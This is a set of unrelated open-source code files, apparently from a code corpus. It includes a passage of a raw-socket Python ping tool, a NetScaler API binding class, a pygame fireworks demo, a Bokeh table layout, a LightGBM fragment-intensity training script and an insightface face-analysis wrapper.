if self.pktsSent > 0: self._frac_loss = self.pktsLost / self.pktsSent return self._frac_loss def packet_sent(self, n=1): self._packets_sent += n def packet_received(self, n=1): self._packets_rcvd += n def record_time(self, value): self._timing_list.append(value) self._reset_statistics() def _reset_statistics(self): self._total_time = None self._mean_time = None self._median_time = None self._pstdev_time = None self._frac_loss = None def _calc_median_time(self): n = 
len(self._timing_list)
        if n == 0:
            return None
        if n & 1 == 1:  # Odd number of samples? Return the middle.
            return sorted(self._timing_list)[n//2]
        else:
            # Even number of samples? Return the mean of the two middle samples.
            halfn = n // 2
            return sum(sorted(self._timing_list)[halfn:halfn+2]) / 2

    def _calc_sum_square_time(self):
        mean = self.mean_time
        return sum(((t - mean)**2 for t in self._timing_list))

    def _calc_pstdev_time(self):
        pvar = self._calc_sum_square_time() / len(self._timing_list)
        return pvar**0.5


# Used as 'global' variable so we can print
# stats when exiting by signal
myStats = MStats2()


def _checksum(source_string):
    """
    A port of the functionality of in_cksum() from ping.c
    Ideally this would act on the string as a series of 16-bit ints (host
    packed), but this works.
    Network data is big-endian, hosts are typically little-endian
    """
    if (len(source_string) % 2):
        source_string += "\x00"

    converted = array.array("H", source_string)
    if sys.byteorder == "big":
        converted.byteswap()
    val = sum(converted)

    val &= 0xffffffff  # Truncate val to 32 bits (a variance from ping.c, which
    # uses signed ints, but overflow is unlikely in ping)

    val = (val >> 16) + (val & 0xffff)    # Add high 16 bits to low 16 bits
    val += (val >> 16)                    # Add carry from above (if any)
    answer = ~val & 0xffff                # Invert and truncate to 16 bits
    answer = socket.htons(answer)

    return answer


def single_ping(destIP, hostname, timeout, mySeqNumber, numDataBytes,
                myStats=None, ipv6=False, verbose=True, sourceIP=None):
    """
    Returns either the delay (in ms) or None on timeout.
    """
    delay = None

    if ipv6:
        try:  # One could use UDP here, but it's obscure
            mySocket = socket.socket(socket.AF_INET6, socket.SOCK_RAW,
                                     socket.getprotobyname("ipv6-icmp"))
            if sourceIP is not None:
                mySocket.bind((sourceIP, 0))
            mySocket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        except OSError as e:
            if verbose:
                print("failed. (socket error: '%s')" % str(e))
                print('Note that python-ping uses RAW sockets '
                      'and requires root rights.')
            raise  # raise the original error
    else:
        try:  # One could use UDP here, but it's obscure
            mySocket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
                                     socket.getprotobyname("icmp"))
            if sourceIP is not None:
                mySocket.bind((sourceIP, 0))
            mySocket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        except OSError as e:
            if verbose:
                print("failed. (socket error: '%s')" % str(e))
                print('Note that python-ping uses RAW sockets '
                      'and requires root rights.')
            raise  # raise the original error

    my_ID = (os.getpid() ^ get_ident()) & 0xFFFF

    sentTime = _send(mySocket, destIP, my_ID, mySeqNumber, numDataBytes,
                     ipv6, verbose)
    if sentTime is None:
        mySocket.close()
        return delay, (None,)

    if myStats is not None:
        myStats.packet_sent()

    recvTime, dataSize, iphSrcIP, icmpSeqNumber, iphTTL \
        = _receive(mySocket, my_ID, timeout, ipv6)

    mySocket.close()

    if recvTime:
        delay = (recvTime-sentTime)*1000
        if ipv6:
            host_addr = hostname
        else:
            try:
                host_addr = socket.inet_ntop(socket.AF_INET, struct.pack(
                    "!I", iphSrcIP))
            except AttributeError:
                # Python on windows doesn't have inet_ntop.
host_addr = hostname if verbose: print("%d bytes from %s: icmp_seq=%d ttl=%d time=%.2f ms" % ( dataSize, host_addr, icmpSeqNumber, iphTTL, delay) ) if myStats is not None: assert isinstance(myStats, MStats2) myStats.packet_received() myStats.record_time(delay) else: delay = None if verbose: print("Request timed out.") return delay, (recvTime, dataSize, iphSrcIP, icmpSeqNumber, iphTTL) def _send(mySocket, destIP, myID, mySeqNumber, numDataBytes, ipv6=False, verbose=True): """ Send one ping to the given >destIP<. """ # destIP = socket.gethostbyname(destIP) # Header is type (8), code (8), checksum (16), id (16), sequence (16) # (numDataBytes - 8) - Remove header size from packet size myChecksum = 0 # Make a dummy heder with a 0 checksum. if ipv6: header = struct.pack( "!BbHHh", ICMP_ECHO_IPV6, 0, myChecksum, myID, mySeqNumber ) else: header = struct.pack( "!BBHHH", ICMP_ECHO, 0, myChecksum, myID, mySeqNumber ) padBytes = [] startVal = 0x42 # 'cose of the string/byte changes in python 2/3 we have # to build the data differnely for different version # or it will make packets with unexpected size. if sys.version[:1] == '2': _bytes = struct.calcsize("d") data = ((numDataBytes - 8) - _bytes) * "Q" data = struct.pack("d", default_timer()) + data else: for i in range(startVal, startVal + (numDataBytes - 8)): padBytes += [(i & 0xff)] # Keep chars in the 0-255 range # data = bytes(padBytes) data = bytearray(padBytes) # Calculate the checksum on the data and the dummy header. myChecksum = _checksum(header + data) # Checksum is in network order # Now that we have the right checksum, we put that in. It's just easier # to make up a new header than to stuff it into the dummy. if ipv6: header = struct.pack( "!BbHHh", ICMP_ECHO_IPV6, 0, myChecksum, myID, mySeqNumber ) else: header = struct.pack( "!BBHHH", ICMP_ECHO, 0, myChecksum, myID, mySeqNumber ) packet = header + data sendTime = default_timer() try: mySocket.sendto(packet, (destIP, 1)) # Port number is irrelevant except OSError as e: if verbose: print("General failure (%s)" % str(e)) return except socket.error as e: if verbose: print("General failure (%s)" % str(e)) return return sendTime def _receive(mySocket, myID, timeout, ipv6=False): """ Receive the ping from the socket. 
Timeout = in ms """ timeLeft = timeout/1000 while True: # Loop while waiting for packet or timeout startedSelect = default_timer() whatReady = select.select([mySocket], [], [], timeLeft) howLongInSelect = (default_timer() - startedSelect) if whatReady[0] == []: # Timeout return None, 0, 0, 0, 0 timeReceived = default_timer() recPacket, addr = mySocket.recvfrom(ICMP_MAX_RECV) ipHeader = recPacket[:20] iphVersion, iphTypeOfSvc, iphLength, iphID, iphFlags, iphTTL, \ iphProtocol, iphChecksum, iphSrcIP, iphDestIP = struct.unpack( "!BBHHHBBHII", ipHeader) if ipv6: icmpHeader = recPacket[0:8] else: icmpHeader = recPacket[20:28] icmpType, icmpCode, icmpChecksum, icmpPacketID, icmpSeqNumber \ = struct.unpack("!BBHHH", icmpHeader) # Match only the packets we care about if (icmpType != 8) and (icmpPacketID == myID): dataSize = len(recPacket) - 28 return timeReceived, (dataSize + 8), iphSrcIP, icmpSeqNumber, \ iphTTL timeLeft = timeLeft - howLongInSelect if timeLeft <= 0: return None, 0, 0, 0, 0 def _dump_stats(myStats): """ Show stats when pings are done """ print("\n----%s PYTHON PING Statistics----" % (myStats.thisIP)) print("%d packets transmitted, %d packets received, %0.1f%% packet loss" % (myStats.pktsSent, myStats.pktsRcvd, 100.0 * myStats.fracLoss)) if myStats.pktsRcvd > 0: print("round-trip (ms) min/avg/max = %0.1f/%0.1f/%0.1f" % ( myStats.minTime, myStats.avrgTime, myStats.maxTime )) print(' median/pstddev = %0.2f/%0.2f' % ( myStats.median_time, myStats.pstdev_time )) print('') return def _signal_handler(signum, frame): """ Handle exit via signals """ global myStats _dump_stats(myStats) print("\n(Terminated with signal %d)\n" % (signum)) sys.exit(0) def _pathfind_ping(destIP, hostname, timeout, mySeqNumber, numDataBytes, ipv6=None, sourceIP=None): single_ping(destIP, hostname, timeout, mySeqNumber, numDataBytes, ipv6=ipv6, verbose=False, sourceIP=sourceIP) time.sleep(0.5) def verbose_ping(hostname, timeout=3000, count=3, numDataBytes=64, path_finder=False, ipv6=False, sourceIP=None): """ Send >count< ping to >destIP< with the given >timeout< and display the result. To continuously attempt ping requests, set >count< to None. To consume the generator, use the following syntax: >>> import ping >>> for return_val in ping.verbose_ping('google.ca'): pass # COLLECT YIELDS AND PERFORM LOGIC. Alternatively, you can consume the generator by using list comprehension: >>> import ping >>> consume = list(ping.verbose_ping('google.ca')) Via the same syntax, you can successfully get the exit code via: >>> import ping >>> consume = list(ping.verbose_ping('google.ca')) >>> exit_code = consume[:-1] # The last yield is the exit code. >>> sys.exit(exit_code) """ global myStats # Handle Ctrl+C signal.signal(signal.SIGINT, _signal_handler) if hasattr(signal, "SIGBREAK"): # Handle Ctrl-Break /Windows/ signal.signal(signal.SIGBREAK, _signal_handler) myStats = MStats2() # Reset the stats mySeqNumber = 0 # Starting value try: if ipv6: info = socket.getaddrinfo(hostname, None)[0] destIP = info[4][0] else: destIP = socket.gethostbyname(hostname) print("\nPYTHON PING %s (%s): %d data bytes" % (hostname, destIP, numDataBytes)) except socket.gaierror as e: print("\nPYTHON PING: Unknown host: %s (%s)" % (hostname, str(e))) print('') return myStats.thisIP = destIP # This will send packet that we don't care about 0.5 seconds before it # starts actually pinging. This is needed in big MAN/LAN networks where # you sometimes loose the first packet. 
(while the switches find the way) if path_finder: print("PYTHON PING %s (%s): Sending pathfinder ping" % (hostname, destIP)) _pathfind_ping(destIP, hostname, timeout, mySeqNumber, numDataBytes, ipv6=ipv6, sourceIP=sourceIP) print() i = 0 while 1: delay = single_ping(destIP, hostname, timeout, mySeqNumber, numDataBytes, ipv6=ipv6, myStats=myStats, sourceIP=sourceIP) delay = 0 if delay is None else delay[0] mySeqNumber += 1 # Pause for the remainder of the MAX_SLEEP period (if applicable) if (MAX_SLEEP > delay): time.sleep((MAX_SLEEP - delay)/1000) if count is not None and i < count: i += 1 yield myStats.pktsRcvd elif count is None: yield myStats.pktsRcvd elif count is not None and i >= count: break _dump_stats(myStats) # 0 if we receive at least one packet # 1 if we don't receive any packets yield not myStats.pktsRcvd def quiet_ping(hostname, timeout=3000, count=3, advanced_statistics=False, numDataBytes=64, path_finder=False, ipv6=False, sourceIP=None): """ Same as verbose_ping, but the results are yielded as a tuple """ myStats = MStats2() # Reset the stats mySeqNumber = 0 # Starting value try: if ipv6: info = socket.getaddrinfo(hostname, None)[0] destIP = info[4][0] else: destIP = socket.gethostbyname(hostname) except socket.gaierror: yield False return myStats.thisIP = destIP # This will send packet that we don't care about 0.5 seconds before it # starts actually pinging. This is needed in big MAN/LAN networks where # you sometimes loose the first packet. (while the switches find the way) if path_finder: _pathfind_ping(destIP, hostname, timeout, mySeqNumber, numDataBytes, ipv6=ipv6, sourceIP=sourceIP) i = 1 while 1: delay = single_ping(destIP, hostname, timeout, mySeqNumber, numDataBytes, ipv6=ipv6, myStats=myStats, verbose=False, sourceIP=sourceIP) delay = 0 if delay is None else delay[0] mySeqNumber += 1 # Pause for the remainder of the MAX_SLEEP period (if applicable) if (MAX_SLEEP > delay): time.sleep((MAX_SLEEP - delay) / 1000) yield myStats.pktsSent if count is not None and i < count: i += 1 elif count is not None and i >= count: break elif count is not None: yield myStats.pktsSent if advanced_statistics: # return tuple(max_rtt, min_rtt, avrg_rtt, percent_lost, median, pop.std.dev) yield myStats.maxTime, myStats.minTime, myStats.avrgTime, myStats.fracLoss,\ myStats.median_time, myStats.pstdev_time else: # return tuple(max_rtt, min_rtt, avrg_rtt, percent_lost) yield myStats.maxTime, myStats.minTime, myStats.avrgTime, myStats.fracLoss if __name__ == '__main__': # FIXME: Add a real CLI (mostly fixed) if sys.argv.count('-T') or sys.argv.count('--test_case'): print('Running PYTHON PING test case.') # These should work: for val in verbose_ping("127.0.0.1"): pass for val in verbose_ping("8.8.8.8"): pass for val in verbose_ping("heise.de"): pass for val in verbose_ping("google.com"): pass # Inconsistent on Windows w/ ActivePython (Python 3.2 resolves # correctly to the local host, but 2.7 tries to resolve to the local # *gateway*) for val in verbose_ping("localhost"): pass # Should fail with 'getaddrinfo failed': for val in verbose_ping("foobar_url.fooobar"): pass # Should fail (timeout), but it depends on the local network: for val in verbose_ping("192.168.255.254"): pass # Should fails with 'The requested address is not valid in its context' for val in verbose_ping("0.0.0.0"): pass exit() parser = argparse.ArgumentParser(prog='python-ping', description='A pure python implementation\ of the ping protocol. 
*REQUIRES ROOT*') parser.add_argument('address', help='The address to attempt to ping.') parser.add_argument('-t', '--timeout', help='The maximum amount of time to\ wait until ping timeout.', type=int, default=3000) parser.add_argument('-c', '--request_count', help='The number of attempts \ to make. See --infinite to attempt requests until \ stopped.', type=int, default=3) parser.add_argument('-i', '--infinite', help='Flag to continuously ping \ a host until stopped.', action='store_true') parser.add_argument('-I', '--ipv6', action='store_true', help='Flag to \ use IPv6.') parser.add_argument('-s', '--packet_size', type=int, help='Designate the\ amount of data to send per packet.', default=64) parser.add_argument('-T', '--test_case', action='store_true', help='Flag \ to run the default test case suite.') parser.add_argument('-S', '--source_address', help='Source address from which \ ICMP Echo packets will be sent.') parsed = parser.parse_args() if parsed.infinite: sys.exit(list(verbose_ping(parsed.address, parsed.timeout, None, parsed.packet_size, ipv6=parsed.ipv6, sourceIP=parsed.source_address))[:-1]) else: sys.exit(list(verbose_ping(parsed.address, parsed.timeout, parsed.request_count, parsed.packet_size, ipv6=parsed.ipv6, sourceIP=parsed.source_address))[:-1])
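# ---------------------------------------------------------------------------
# Hedged usage sketch (editor's addition): one way to consume quiet_ping() and
# read the summary tuple that is yielded last. The host below is a placeholder
# and, like every ping here, requires root/Administrator privileges to run.
#
#   results = list(quiet_ping('127.0.0.1', timeout=2000, count=2))
#   summary = results[-1]        # (max_rtt, min_rtt, avrg_rtt, frac_lost)
#   if summary is False:         # quiet_ping yields only False on a DNS failure
#       print('unknown host')
#   else:
#       max_rtt, min_rtt, avrg_rtt, frac_lost = summary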
the-stack_106_24373
# # Copyright (c) 2021 Citrix Systems, Inc. # # Licensed under the Apache License, Version 2.0 (the "License") # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response from nssrc.com.citrix.netscaler.nitro.service.options import options from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util class responderpolicy_responderglobal_binding(base_resource) : """ Binding class showing the responderglobal that can be bound to responderpolicy. """ def __init__(self) : self._boundto = None self._priority = None self._activepolicy = None self._gotopriorityexpression = None self._labeltype = None self._labelname = None self._name = None self.___count = None @property def boundto(self) : r"""Location where policy is bound. """ try : return self._boundto except Exception as e: raise e @boundto.setter def boundto(self, boundto) : r"""Location where policy is bound. """ try : self._boundto = boundto except Exception as e: raise e @property def name(self) : r"""Name of the responder policy for which to display settings. """ try : return self._name except Exception as e: raise e @name.setter def name(self, name) : r"""Name of the responder policy for which to display settings. """ try : self._name = name except Exception as e: raise e @property def priority(self) : r"""Specifies the priority of the policy. """ try : return self._priority except Exception as e: raise e @property def labelname(self) : r"""Name of the label to invoke if the current policy rule evaluates to TRUE. """ try : return self._labelname except Exception as e: raise e @property def gotopriorityexpression(self) : r"""Expression specifying the priority of the next policy which will get evaluated if the current policy rule evaluates to TRUE. """ try : return self._gotopriorityexpression except Exception as e: raise e @property def labeltype(self) : r"""Type of policy label invocation.<br/>Possible values = reqvserver, resvserver, policylabel. """ try : return self._labeltype except Exception as e: raise e @property def activepolicy(self) : r"""Indicates whether policy is bound or not. """ try : return self._activepolicy except Exception as e: raise e def _get_nitro_response(self, service, response) : r""" converts nitro response into object and returns the object array in case of get request. 
""" try : result = service.payload_formatter.string_to_resource(responderpolicy_responderglobal_binding_response, response, self.__class__.__name__) if(result.errorcode != 0) : if (result.errorcode == 444) : service.clear_session(self) if result.severity : if (result.severity == "ERROR") : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) else : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) return result.responderpolicy_responderglobal_binding except Exception as e : raise e def _get_object_name(self) : r""" Returns the value of object identifier argument """ try : if self.name is not None : return str(self.name) return None except Exception as e : raise e @classmethod def get(cls, service, name="", option_="") : r""" Use this API to fetch responderpolicy_responderglobal_binding resources. """ try : if not name : obj = responderpolicy_responderglobal_binding() response = obj.get_resources(service, option_) else : obj = responderpolicy_responderglobal_binding() obj.name = name response = obj.get_resources(service) return response except Exception as e: raise e @classmethod def get_filtered(cls, service, name, filter_) : r""" Use this API to fetch filtered set of responderpolicy_responderglobal_binding resources. Filter string should be in JSON format.eg: "port:80,servicetype:HTTP". """ try : obj = responderpolicy_responderglobal_binding() obj.name = name option_ = options() option_.filter = filter_ response = obj.getfiltered(service, option_) return response except Exception as e: raise e @classmethod def count(cls, service, name) : r""" Use this API to count responderpolicy_responderglobal_binding resources configued on NetScaler. """ try : obj = responderpolicy_responderglobal_binding() obj.name = name option_ = options() option_.count = True response = obj.get_resources(service, option_) if response : return response[0].__dict__['___count'] return 0 except Exception as e: raise e @classmethod def count_filtered(cls, service, name, filter_) : r""" Use this API to count the filtered set of responderpolicy_responderglobal_binding resources. Filter string should be in JSON format.eg: "port:80,servicetype:HTTP". """ try : obj = responderpolicy_responderglobal_binding() obj.name = name option_ = options() option_.count = True option_.filter = filter_ response = obj.getfiltered(service, option_) if response : return response[0].__dict__['___count'] return 0 except Exception as e: raise e class Labeltype: reqvserver = "reqvserver" resvserver = "resvserver" policylabel = "policylabel" class responderpolicy_responderglobal_binding_response(base_response) : def __init__(self, length=1) : self.responderpolicy_responderglobal_binding = [] self.errorcode = 0 self.message = "" self.severity = "" self.sessionid = "" self.responderpolicy_responderglobal_binding = [responderpolicy_responderglobal_binding() for _ in range(length)]
the-stack_106_24376
import pygame,sys,random

colors = [ "red","green", "yellow", "orange","turquoise"]

fireworks = {
    "red":"red.png",
    "turquoise":"blue.png",
    "orange":"orange.png",
    "green":"green.png",
    "yellow":"yellow.png",
    }


class Firework:
    def __init__(self,y = 590):
        self.x = random.randint(20,880)
        self.y = y
        self.explode_height = random.randint(20,200)
        self.speed = random.randint(3,9)
        self.color = random.choice(colors)
        self.loaded_color = pygame.Color(self.color)
        self.image = pygame.image.load(fireworks[self.color])
        self.exploding = False
        self.dead = False
        self.particles = []
        self.show_count = 0

    def explode(self):
        for i in range(30):
            x_pos = self.x + random.randint(-50,50)
            y_pos = self.y + random.randint(-50,50)
            rect = pygame.Rect(x_pos, y_pos, 2,2)
            self.particles.append(rect)

    def show(self, window):
        if self.exploding:
            for particle in self.particles:
                particle.y += 2
                pygame.draw.rect(window, self.loaded_color, particle, 0)
            self.show_count += 1
            if self.show_count > 700:
                self.dead = True
        elif self.y > self.explode_height:
            self.y -= self.speed
            window.blit(self.image,(self.x,self.y))
        else:
            self.explode()
            self.exploding = True


class FireworksManager:
    def __init__(self, limit = 10):
        self.fireworks = [] # takes a Firework class
        self.limit = limit

    def show(self,window):
        if len(self.fireworks) < self.limit:
            self.fireworks.append(Firework())
        for fw in self.fireworks:
            if fw.dead:
                self.fireworks.pop(self.fireworks.index(fw))
            else:
                fw.show(window)


class Screen:
    def __init__(self, size, fps = 50):
        self.running = True
        self.name = ""
        self.size = size
        self.clock = pygame.time.Clock()
        self.fps = fps
        self.events = pygame.event.get()
        self.window = pygame.display.set_mode(self.size)

    def screen_backend(self):
        self.clock.tick(self.fps)
        pygame.display.set_caption(self.name)

    def exit(self): # exit the screen
        self.running = False

    def quit_event(self ): # anticipate a quit event
        for ev in self.events:
            if ev.type == pygame.QUIT:
                pygame.quit()
                self.running = False
                sys.exit()

    def display_widgets(self):  # hook called by show(); subclasses override this
        pass

    def show(self):
        while self.running:
            self.display_widgets()
            self.events = pygame.event.get()
            self.screen_backend()
            self.quit_event()
            pygame.display.update()
            continue
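# ---------------------------------------------------------------------------
# Hedged usage sketch (editor's addition): wires FireworksManager into the
# Screen loop. The window size matches the coordinate ranges used by Firework,
# and the PNG assets listed in `fireworks` are assumed to sit next to this
# script.
class FireworksScreen(Screen):
    def __init__(self):
        Screen.__init__(self, (900, 600))
        self.name = "Fireworks"
        self.manager = FireworksManager(limit=10)

    def display_widgets(self):
        self.window.fill((0, 0, 0))      # clear the previous frame
        self.manager.show(self.window)


if __name__ == "__main__":
    pygame.init()
    FireworksScreen().show()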
the-stack_106_24380
"""Return data tables. Widgets: - summary_title: Div containing title of summary_table - summary_table: Contains summary statistics for numeric data columns - data_title: Div containing title of data_table - data_table: Contains all rows and columns of dataset """ # %% Imports # Standard system imports # Related third party imports from bokeh.models import ColumnDataSource, DataTable, TableColumn, Div from bokeh.layouts import column # Local application/library specific imports # %% Define tables def data_tables(data, source, summary_list, dataset_name, metadata): """Return data tables summarizing dataset.""" # ------------------------------------------------------------------------- # Setup # ------------------------------------------------------------------------- ml_type = metadata['type'] # Parse summary dictionary and use it to create a ColumnDataSource row_labels = ['Data Type', 'Count', 'Mean', 'STD', 'Min', '25%', '50%', '75%', 'Max'] summary = {'row_labels': row_labels} summary_cols = [TableColumn(field='row_labels', title='Column')] for col_dict in summary_list: summary_cols.append(TableColumn(field=col_dict['column'], title=col_dict['column'], width=len(col_dict['column']))) summary[col_dict['column']] = [ col_dict['data_type'], col_dict['count'], round(col_dict['avg'], 2), round(col_dict['std'], 2), round(col_dict['min'], 2), round(col_dict['25%'], 2), round(col_dict['50%'], 2), round(col_dict['75%'], 2), round(col_dict['max'], 2) ] summary_source = ColumnDataSource(summary) # ------------------------------------------------------------------------- # Widgets # ------------------------------------------------------------------------- # Title for summary table summary_title = Div( text=""" <div style="display: table; height: 50px; overflow: hidden;"> <div style="display: table-cell; vertical-align: middle;"> <h1 class="bokeh_header">Summary Statistics</h1> </div> </div>""", height=50) # Summary table of statistics summary_table = DataTable( source=summary_source, columns=summary_cols, index_position=None, sizing_mode='stretch_width', height=275, autosize_mode="fit_viewport") # Title for data table data_title = Div( text=""" <style> .bokeh_header {font-size: 30px; margin: auto;} </style> """ f""" <div style="display: table; height: 50px; overflow: hidden;"> <div style="display: table-cell; vertical-align: middle;"> <h1 class="bokeh_header">{dataset_name} data</h1> </div> </div>""", height=50) # Data table containing all rows and columns of dataset columns = [TableColumn(field=col, title=col) for col in data.keys()] if ml_type == 'classification': data_table = DataTable( source=source, columns=columns, sortable=True, sizing_mode='stretch_width', autosize_mode="fit_viewport") elif ml_type == 'regression': data_table = DataTable( source=source, columns=columns, sortable=True, sizing_mode='stretch_width', autosize_mode="fit_viewport", height=275) return column(summary_title, summary_table), column(data_title, data_table)
the-stack_106_24382
import os import sys import argparse import pandas as pd import numpy as np import lightgbm as lgb from sklearn.metrics import precision_recall_curve from sklearn.metrics import average_precision_score import random import operator import pickle as pickle import matplotlib.pyplot as plt np.random.seed(1) def load_data(vector_filename, ion_type): # Read file if vector_filename.split(".")[-1] == "pkl": vectors = pd.read_pickle(vector_filename) elif vector_filename.split(".")[-1] == "h5": # vectors = pd.read_hdf(vector_filename, key='table', stop=1000) vectors = pd.read_hdf(vector_filename, key="table") else: print("Unsuported feature vector format") exit(1) # Extract targets for given ion type target_names = list(vectors.columns[vectors.columns.str.contains("targets")]) if not "targets{}".format(ion_type) in target_names: print("Targets for {} could not be found in vector file.".format(ion_type)) print("Vector file only contains these targets: {}".format(target_names)) exit(1) targets = vectors.pop("targets{}".format(ion_type)) target_names.remove("targets{}".format(ion_type)) for n in target_names: vectors.pop(n) # Get psmids psmids = vectors.pop("psmid") return (vectors, targets, psmids) fragtype = "y" nul_cpu = 24 print("loading train data") vectors, targets, psmids = load_data(sys.argv[1], fragtype) print("Splitting up into train and test set...") upeps = psmids.unique() np.random.shuffle(upeps) test_psms = upeps[: int(len(upeps) * 0.3)] train_vectors = vectors[~psmids.isin(test_psms)] train_targets = targets[~psmids.isin(test_psms)] train_psmids = psmids[~psmids.isin(test_psms)] test_vectors = vectors[psmids.isin(test_psms)] test_targets = targets[psmids.isin(test_psms)] test_psmids = psmids[psmids.isin(test_psms)] print("Creating LightGBM datastructures...") data = lgb.Dataset(train_vectors, label=train_targets) datatest = lgb.Dataset(test_vectors, label=test_targets) valid_sets = [datatest] vector_sets = [test_vectors] target_sets = [test_targets] psmid_sets = [test_psmids] print("loading evaluation data") for fn in sys.argv[2:]: vectors, targets, psmids = load_data(fn, fragtype) tmp = lgb.Dataset(vectors, label=targets) valid_sets.append(tmp) psmid_sets.append(psmids) vector_sets.append(vectors) target_sets.append(targets) sys.stderr.write("loading data done\n") tmp2 = pd.DataFrame() tmp3 = pd.DataFrame() tmp3["psmid"] = test_psmids[test_vectors["charge"] == 3] tmp3["target"] = test_targets[test_vectors["charge"] == 3] tmp4 = pd.DataFrame() tmp4["psmid"] = test_psmids[test_vectors["charge"] == 4] tmp4["target"] = test_targets[test_vectors["charge"] == 4] for max_depth in [7, 9, 11]: for num_leaves in [50, 100, 200]: params = {} params["objective"] = "regression" params["metric"] = "l1" params["learning_rate"] = 0.8 # params['sub_feature'] = 1 params["num_leaves"] = num_leaves # params['min_data'] = 50 params["max_depth"] = max_depth num_round = 100 # lgb.cv(param, data, num_round, nfold=5) bst = lgb.train(params, data, num_round, valid_sets=valid_sets) for c in [2, 3, 4]: for i in range(len(valid_sets)): tmp = pd.DataFrame() tmp["psmid"] = psmid_sets[i][vector_sets[i]["charge"] == c] tmp["target"] = target_sets[i][vector_sets[i]["charge"] == c] tmp["prediction"] = bst.predict( vector_sets[i][vector_sets[i]["charge"] == c] ) tmpp = ( tmp.groupby("psmid")[["target", "prediction"]].corr().iloc[0::2, -1] ) print( ">>%i %i %i %i %s" % ( c, i, max_depth, num_leaves, " ".join( [ str(x) for x in np.nanpercentile( tmpp.values, [10, 30, 50, 70, 90] ) ] ), ) ) exit() # 
bst.save_model('model.txt') print(bst.feature_importance()) model_json = bst.dump_model() print(model_json["tree_info"]) def parseOneTree(root, index, array_type="double", return_type="double"): def ifElse(node): if "leaf_index" in node: return "return " + str(node["leaf_value"]) + ";" else: condition = "arr[" + str(node["split_feature"]) + "]" if node["decision_type"] == "no_greater": condition += " <= " + str(node["threshold"]) else: condition += " == " + str(node["threshold"]) left = ifElse(node["left_child"]) right = ifElse(node["right_child"]) return "if ( " + condition + " ) { " + left + " } else { " + right + " }" return ( return_type + " predictTree" + str(index) + "(" + array_type + "[] arr) { " + ifElse(root) + " }" ) def parseAllTrees(trees, array_type="double", return_type="double"): return ( "\n\n".join( [ parseOneTree(tree["tree_structure"], idx, array_type, return_type) for idx, tree in enumerate(trees) ] ) + "\n\n" + return_type + " predict(" + array_type + "[] arr) { " + "return " + " + ".join(["predictTree" + str(i) + "(arr)" for i in range(len(trees))]) + ";" + "}" ) with open("if.else", "w+") as f: f.write(parseAllTrees(model_json["tree_info"]))
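# ---------------------------------------------------------------------------
# Hedged sketch (editor's addition): the vector-file layout that load_data()
# above expects -- feature columns (including 'charge') plus a 'psmid' column
# and one 'targets<ion>' column per ion type. File and column names here are
# placeholders.
#
#   import pandas as pd
#   df = pd.DataFrame({'charge': [2, 3], 'feat1': [0.1, 0.4],
#                      'psmid': ['pep1', 'pep2'],
#                      'targetsy': [1.2, 3.4], 'targetsb': [0.5, 0.7]})
#   df.to_pickle('train_vectors.pkl')
#   # usage: python <this script> train_vectors.pkl eval_vectors.pkl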
the-stack_106_24383
# -*- coding: utf-8 -*- # @Organization : insightface.ai # @Author : Jia Guo # @Time : 2021-05-04 # @Function : from __future__ import division import collections import numpy as np import glob import os import os.path as osp from numpy.linalg import norm from ..model_zoo import model_zoo from ..utils import face_align from ..utils import ensure_available from .common import Face from ..utils import DEFAULT_MP_NAME __all__ = ['FaceAnalysis'] class FaceAnalysis: def __init__(self, name=DEFAULT_MP_NAME, root='~/.insightface/models', allowed_modules=None): self.models = {} #root = os.path.expanduser(root) #self.model_dir = osp.join(root, name) #self.model_dir = get_model_dir(name, root) self.model_dir = ensure_available('models', name) onnx_files = glob.glob(osp.join(self.model_dir, '*.onnx')) onnx_files = sorted(onnx_files) for onnx_file in onnx_files: if onnx_file.find('_selfgen_')>0: #print('ignore:', onnx_file) continue model = model_zoo.get_model(onnx_file) if allowed_modules is not None and model.taskname not in allowed_modules: print('model ignore:', onnx_file, model.taskname) del model elif model.taskname not in self.models and (allowed_modules is None or model.taskname in allowed_modules): print('find model:', onnx_file, model.taskname, model.input_shape, model.input_mean, model.input_std) self.models[model.taskname] = model else: print('duplicated model task type, ignore:', onnx_file, model.taskname) del model assert 'detection' in self.models self.det_model = self.models['detection'] def prepare(self, ctx_id, det_thresh=0.5, det_size=(640, 640)): self.det_thresh = det_thresh assert det_size is not None print('set det-size:', det_size) self.det_size = det_size for taskname, model in self.models.items(): if taskname=='detection': model.prepare(ctx_id, input_size=det_size, det_thresh=det_thresh) else: model.prepare(ctx_id) def get(self, img, max_num=0): bboxes, kpss = self.det_model.detect(img, max_num=max_num, metric='default') if bboxes.shape[0] == 0: return [] ret = [] for i in range(bboxes.shape[0]): bbox = bboxes[i, 0:4] det_score = bboxes[i, 4] kps = None if kpss is not None: kps = kpss[i] face = Face(bbox=bbox, kps=kps, det_score=det_score) for taskname, model in self.models.items(): if taskname=='detection': continue model.get(img, face) ret.append(face) return ret def draw_on(self, img, faces): import cv2 dimg = img.copy() for i in range(len(faces)): face = faces[i] box = face.bbox.astype(np.int) color = (0, 0, 255) cv2.rectangle(dimg, (box[0], box[1]), (box[2], box[3]), color, 2) if face.kps is not None: kps = face.kps.astype(np.int) #print(landmark.shape) for l in range(kps.shape[0]): color = (0, 0, 255) if l == 0 or l == 3: color = (0, 255, 0) cv2.circle(dimg, (kps[l][0], kps[l][1]), 1, color, 2) #for key, value in face.items(): # if key.startswith('landmark_3d'): # print(key, value.shape) # print(value[0:10,:]) # lmk = np.round(value).astype(np.int) # for l in range(lmk.shape[0]): # color = (255, 0, 0) # cv2.circle(dimg, (lmk[l][0], lmk[l][1]), 1, color, # 2) return dimg
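# Hedged usage sketch (editor's addition): the usual prepare/get/draw_on flow.
# The image path is a placeholder; model packs are downloaded under
# ~/.insightface/models by default.
#
#   import cv2
#   app = FaceAnalysis()
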